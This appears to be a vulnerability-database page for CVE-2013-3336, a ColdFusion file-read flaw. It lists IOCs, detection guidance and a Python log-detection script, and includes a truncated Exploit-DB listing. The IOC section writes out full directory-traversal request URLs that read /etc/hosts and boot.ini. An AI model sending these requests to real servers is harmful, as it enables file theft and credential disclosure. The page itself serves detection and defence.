CVE-2013-3336
Published 2013-05-09
CVE-2013-3336: Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to read arbitrary files via unknown vectors.
Priority: P2 · 73 · medium
CVSS 2.0: 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 74.27% (99.4th percentile)
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | coldfusion | 9.0 | APSB13-13 hotfix |
| adobe | coldfusion | 9.0.1 | APSB13-13 hotfix |
| adobe | coldfusion | 9.0.2 | APSB13-13 hotfix |
| adobe | coldfusion | 10 | APSB13-13 hotfix |
Detection & IOCs (extracted from sources)
URL indicators:
- /CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../etc/hosts&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
- /CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../boot.ini&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
- /CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
Detection guidance:
- Detect directory traversal exploitation attempts targeting l10n.cfm: the 'attributes.file' and 'filename' parameters contain path traversal sequences (../../), 'attributes.file' points at download.cfm, and the query string carries 'thisTag.executionmode=end'.
- Alert on HTTP responses setting the 'ANALYZER_DIRECTORY' cookie; it indicates successful path disclosure through the l10n.cfm endpoint.
- Flag HTTP requests to /CFIDE/adminapi/customtags/l10n.cfm containing 'thisTag.executionmode=end' and 'thisTag.generatedContent=htp' as indicators of active exploitation.
- Detect successful credential file exfiltration by monitoring HTTP responses for the string 'encrypted=true', which indicates password.properties content was returned.
- Monitor GET requests to /CFIDE/administrator/images/loginbackground.jpg as a fingerprinting step preceding exploitation; MD5 hashes of the response body are used to identify the ColdFusion version.
- The Metasploit module uses the same directory traversal to extract the password, rdspassword, and encrypted properties from password.properties on ColdFusion 9 and 10.
- The exploit is described as a Local File Inclusion (LFI), not a Local File Download: it can include and execute pre-existing .cfm files on the server, not just read arbitrary files.
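The request and response rules above, together with the password.properties extraction the Metasploit entry describes, as runnable detection logic. This is an added example and is not code from any of the page's sources. It assumes an Apache-style combined access log, tag names of its own choosing, and constructed sample data: the log lines reuse the IOC URLs from this page, but the cookie value and the password.properties contents are made up. The extra percent-decoding pass for `%252e%252e%252f`-style evasion is a defensive assumption, not something the sources describe.

```python
"""Detection logic for the CVE-2013-3336 IOCs listed above, run over constructed
log lines and constructed HTTP responses.  Added example; log layout, tag names
and sample values are assumptions."""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Endpoints named in the IOC list (compared case-insensitively: ColdFusion on
# Windows serves /cfide/ and /CFIDE/ alike).
L10N_PATH = "/cfide/adminapi/customtags/l10n.cfm"
FINGERPRINT_PATH = "/cfide/administrator/images/loginbackground.jpg"
# "../" or "..\" after percent-decoding.
TRAVERSAL = re.compile(r"\.\.[\\/]")
# Method and URL from an Apache-style combined log line (assumed format).
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+"')


def _split_url(url):
    """Return (lower-cased decoded path, {lower-cased param: [decoded values]}).
    parse_qs already decodes once; the extra unquote() catches double-encoded
    traversal such as %252e%252e%252f (an evasion assumption, not from the sources)."""
    parsed = urlparse(url)
    params = parse_qs(parsed.query, keep_blank_values=True)
    path = unquote(parsed.path).lower()
    return path, {k.lower(): [unquote(v) for v in vs] for k, vs in params.items()}


def classify_request(method, url):
    """Tags for one request; an empty list means nothing of interest."""
    tags = []
    path, q = _split_url(url)
    if method.upper() == "GET" and path == FINGERPRINT_PATH:
        tags.append("cf-version-fingerprint")  # precedes exploitation; MD5 of body -> CF version
    if path != L10N_PATH:
        return tags
    file_vals = q.get("attributes.file", [])
    name_vals = q.get("filename", [])
    exec_end = any(v.lower() == "end" for v in q.get("thistag.executionmode", []))
    if exec_end and "thistag.generatedcontent" in q:
        tags.append("l10n-thistag-abuse")  # executionmode=end + generatedContent: active exploitation
    traversal = any(TRAVERSAL.search(v) for v in file_vals + name_vals)
    if traversal and exec_end and any("download.cfm" in v.lower() for v in file_vals):
        tags.append("l10n-download-traversal")  # arbitrary file read via download.cfm
    if traversal and any("analyzer/index.cfm" in v.lower() for v in file_vals):
        tags.append("l10n-analyzer-path-disclosure")  # install path leaks via ANALYZER_DIRECTORY cookie
    return tags


def scan_log(lines):
    """Return [(url, tags)] for every log line that trips at least one rule."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        tags = classify_request(m.group("method"), m.group("url"))
        if tags:
            hits.append((m.group("url"), tags))
    return hits


def classify_response(headers, body):
    """headers: iterable of (name, value) pairs; body: decoded response text."""
    tags = []
    for name, value in headers:
        if name.lower() == "set-cookie" and value.split("=", 1)[0].strip().upper() == "ANALYZER_DIRECTORY":
            tags.append("analyzer-directory-cookie")
    if "encrypted=true" in body.lower():  # password.properties content came back
        tags.append("password-properties-leak")
    return tags


def parse_password_properties(body):
    """Pull the three keys the Metasploit module reports out of leaked
    password.properties text (Java .properties layout, key=value per line)."""
    found = {}
    for line in body.splitlines():
        m = re.match(r"\s*(password|rdspassword|encrypted)\s*=\s*(.*?)\s*$", line, re.I)
        if m:
            found[m.group(1).lower()] = m.group(2)
    return found


# Constructed sample log: 203.0.113.7 fingerprints, then sends two of the l10n.cfm
# requests from the IOC list; 198.51.100.4 is benign admin traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/May/2013:10:01:02 +0000] "GET /CFIDE/administrator/images/loginbackground.jpg HTTP/1.1" 200 15620',
    '203.0.113.7 - - [09/May/2013:10:01:05 +0000] "GET /CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp HTTP/1.1" 200 1402',
    '203.0.113.7 - - [09/May/2013:10:01:09 +0000] "GET /CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../etc/hosts&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp HTTP/1.1" 200 512',
    '198.51.100.4 - - [09/May/2013:10:02:00 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 3021',
]
# Constructed responses: the cookie value and the properties content are made up.
SAMPLE_ANALYZER_HEADERS = [
    ("Content-Type", "text/html; charset=UTF-8"),
    ("Set-Cookie", "ANALYZER_DIRECTORY=C%3A%5CColdFusion10%5Ccfusion%5Cwwwroot%5CCFIDE%5Cadministrator%5Canalyzer; path=/"),
]
SAMPLE_LEAK_BODY = (
    "#Wed May 08 10:00:00 UTC 2013\n"
    "rdspassword=AAAAAAAAAAAAAAAAAAAAAA==\n"
    "password=0000000000000000000000000000000000000000\n"
    "encrypted=true\n"
)

if __name__ == "__main__":
    for url, tags in scan_log(SAMPLE_LOG):
        print(tags, url[:70])
    print(classify_response(SAMPLE_ANALYZER_HEADERS, ""))
    print(classify_response([("Content-Type", "text/html")], SAMPLE_LEAK_BODY))
    print(parse_password_properties(SAMPLE_LEAK_BODY))
```

The request rules are kept separate from the response rules on purpose: a proxy or WAF only sees the request, while the `ANALYZER_DIRECTORY` cookie and the `encrypted=true` string only show up in the response, so a sensor that can see both should correlate the two to distinguish a blocked attempt from a successful read.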
CVSS provenance
NVD (v2.0): 5.0 MEDIUM, AV:N/AC:L/Au:N/C:P/I:N/A:N
VulnCheck: 5.0 MEDIUM
GHSA
GHSA-h3v4-8w95-f7j6 (ghsa, unreviewed, 2022-05-17) [MEDIUM]: Unspecified vulnerability in Adobe ColdFusion 9
Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to read arbitrary files via unknown vectors.
VulnCheck
Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 Remote File Read (vulncheck, 2013, CVSS 5.0 [MEDIUM])
Unspecified vulnerability in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to read arbitrary files via unknown vectors.
Affected: Adobe ColdFusion
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://cisa.gov/news-events/alerts/2013/05/09/adobe-releases-security-update-coldfusion
- https://cisa.gov/news-events/alerts/2015/04/29/top-30-targeted-high-risk-vulnerabilities
- https://www.us-cert.gov/ncas/alerts/TA15-119A
No detection rules found.
Exploit-DB
ColdFusion 9-10 - Credential Disclosure (exploitdb, 2013-05-08, EDB-ID 25305)
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Python 2 listing from Exploit-DB 25305; print statements converted to Python 3.
# The listing is cut off on the page after the "abspath" assignment.
intro = r"""
 _ _ _______ _____ _ _ _______          Cold ,''' Fusion
|_____| | |_____] \ / |______            Cold ,''' /-- Fusion
| | | | \/ ______|.                      Cold -,__,' Fusion
Name        : ColdSub-Zero.pyFusion v2
Description : CF9-10 Remote Root Zeroday
Crew        : HTP
"""
cyan = "\x1b[1;36m"
red = "\x1b[1;31m"
clear = "\x1b[0m"
print(intro.replace("Cold", cyan).replace("Fusion", clear))
import requests, time, sys, urllib, hashlib


def flash(color, text, times):
    """Blink `text` in `color` on the terminal `times` times, then print it plainly."""
    sys.stdout.write(text)
    line1 = "\x0d\x1b[2K%s%s" % (color, text)   # carriage return, clear line, coloured text
    line2 = "\x0d\x1b[2K%s%s" % (clear, text)   # same, uncoloured
    for x in range(0, times):
        sys.stdout.write(line1)
        sys.stdout.flush()
        time.sleep(.2)
        sys.stdout.write(line2)
        sys.stdout.flush()
        time.sleep(.2)
    print(line2)


abspath = ""
# operatings   <- the source listing is truncated here
```
Metasploit
ColdFusion 'password.properties' Hash Extraction (metasploit)
This module uses a directory traversal vulnerability to extract information such as password, rdspassword, and "encrypted" properties. This module has been tested successfully on ColdFusion 9 and ColdFusion 10 (auto-detect).
Qualys
US-CERT: Top 30 Vulnerabilities | Qualys (blogs_qualys, 2015-05-01, CVSS 2.6 [LOW])
On April 29, 2015 US-CERT published TA15-119A which describes the Top 30 vulnerabilities that critical infrastructure organizations should focus on because they are under attack all the time. The list contains Windows, Internet Explorer, Adobe Software from Reader, Flash to Cold Fusion, Java from Oracle and others and is quite similar to the more generic set of software packages published by the German BSI last December.
Here is a list of the vulnerabilities in the advisory. I have reordered and optimized where possible for efficient scanning with Qualys, for example listing the most recent patch first to take advantage of superseding patches:
- Windows: MS14-060 for CVE-2014-4114, Qualys ID: 90979
- Internet Explorer: MS14-021 for CVE-2014-1776, Qualys ID: 100191
- MS14-012 for CVE-2014-0322
- MS13-038 for CVE-2013-1347
- MS13-008 for CVE-2012-4792
- MS10-01
References
- http://www.adobe.com/support/security/advisories/apsa13-03.html
- http://www.adobe.com/support/security/bulletins/apsb13-13.html
- http://www.exploit-db.com/exploits/25305